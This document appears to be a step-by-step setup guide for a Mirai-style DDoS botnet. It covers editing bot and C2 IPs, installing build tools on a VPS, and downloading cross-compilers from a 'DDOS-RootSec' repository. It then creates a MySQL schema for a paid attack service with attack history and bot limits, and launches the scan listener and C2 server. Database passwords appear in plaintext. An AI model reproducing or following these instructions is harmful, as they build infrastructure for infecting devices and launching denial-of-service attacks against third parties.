IPs to change


bot : util.c - includes.h

cnc:  main.go


dlr: main.c

loader/src/headers: main.c - config.h

last one : scanListen.go

1 run this in vps


sed -i 's/mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-*
sed -i 's|#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-*


---------------------------------------------------------------------------------------------------------------

2

yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
yum install -yum install firewalld -y 
yum install iptables-services -y 
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install wget curl -y
yum install epel-release -y
yum install mod_evasive -y
yum install unzip -y
yum install -y bind-utils
yum install -y tcpdump bind-utils
yum install net-tools -y
yum update -y 
yum install -y gcc-c++ gcc glibc-static glibc-devel
yum install -y gcc-arm-linux-gnu gcc-mips-linux-gnu gcc-powerpc-linux-gnu
yum install -y epel-release && yum makecache
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence python sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y

-------------------------------------------------------------------------------------------------------------------
3

wget http://repo.mysql.com/mysql-community-release-el7-5.noarch.rpm
sudo rpm -ivh mysql-community-release-el7-5.noarch.rpm
yum update -y
yum install mysql-server
systemctl start mysqld
systemctl enable mysqld

-------------------------------------------------------------------------------------------
4
wget https://go.dev/dl/go1.24.1.linux-amd64.tar.gz
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.24.1.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
export PATH=$PATH:/usr/local/go/bin
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
source ~/.bashrc
go mod init root
go mod tidy
go get golang.org/x/crypto/ssh
go mod tidy

------------------------------------------------------------------------------------------
5
chmod 777 *
./cryptervega string urdomain.com   < put ur real domain


-------------------------------------------------------------------------------------------------------------
6

mkdir /etc/xcompile
cd /etc/xcompile
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-i586.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-i686.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-m68k.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-mips.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-mipsel.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-powerpc.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-sh4.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-sparc.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-armv4l.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-armv5l.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-armv6l.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-armv7l.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-powerpc-440fp.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-x86_64.tar.bz2
 wget https://github.com/R00tS3c/DDOS-RootSec/raw/master/uclib-cross-compilers/cross-compiler-i486.tar.gz


 tar -jxf cross-compiler-i586.tar.bz2
 tar -jxf cross-compiler-m68k.tar.bz2
 tar -jxf cross-compiler-mips.tar.bz2
 tar -jxf cross-compiler-mipsel.tar.bz2
 tar -jxf cross-compiler-powerpc.tar.bz2
 tar -jxf cross-compiler-sh4.tar.bz2
 tar -jxf cross-compiler-i586.tar.bz2
 tar -jxf cross-compiler-i686.tar.bz2
 tar -jxf cross-compiler-sparc.tar.bz2
 tar -jxf cross-compiler-armv4l.tar.bz2
 tar -jxf cross-compiler-armv5l.tar.bz2
 tar -jxf cross-compiler-armv6l.tar.bz2
 tar -jxf cross-compiler-armv7l.tar.bz2
 tar -vxf arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
 tar -jxf cross-compiler-powerpc-440fp.tar.bz2
 tar -jxf cross-compiler-x86_64.tar.bz2
 tar -xvf cross-compiler-i486.tar.gz

 rm -rf *.tar.bz2
 mv cross-compiler-i486 i486
 mv cross-compiler-i586 i586
 mv cross-compiler-i686 i686
 mv cross-compiler-m68k m68k
 mv cross-compiler-mips mips
 mv cross-compiler-mipsel mipsel
 mv cross-compiler-powerpc powerpc
 mv cross-compiler-sh4 sh4
 mv cross-compiler-sparc sparc
 mv cross-compiler-armv4l armv4l
 mv cross-compiler-armv5l armv5l
 mv cross-compiler-armv6l armv6l
 mv cross-compiler-armv7l armv7l
 mv arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install arc
 mv cross-compiler-powerpc-440fp powerpc-440fp
 mv cross-compiler-x86_64 x86_64
 cd ~/

-----------------------------------------------------------------------

###BELOW MIGHT NOT BE REQUIRED IF YOU ALREADY SET YOUR MYSQL PASSWORD WHEN YOU INSTALLED MYSQL-CLIENT & MYSQL-SERVER###
7


service mysqld restart
mysql_secure_installation

ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'Yousefnasser2007#';
FLUSH PRIVILEGES;
EXIT;

8

mysql -uroot -pbinks242


9

CREATE DATABASE maka;
use maka;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);

CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);

CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);




INSERT INTO users VALUES (NULL, 'root', 'binks242', 0, 0, 0, 0, -1, 1, 30, '');
quit;

10

iptables -F; service httpd restart; service mariadb restart; sed -i 's/1024/999999/g' /usr/include/bits/typesizes.h; ulimit -n999999; ulimit -u999999; ulimit -e999999

11

chmod -R 777 *
bash build.sh

12
cd loader
screen ./scanListen first run in it press ctrl + A and D  

cd  
screen ./c2    first run in it press ctrl + A and D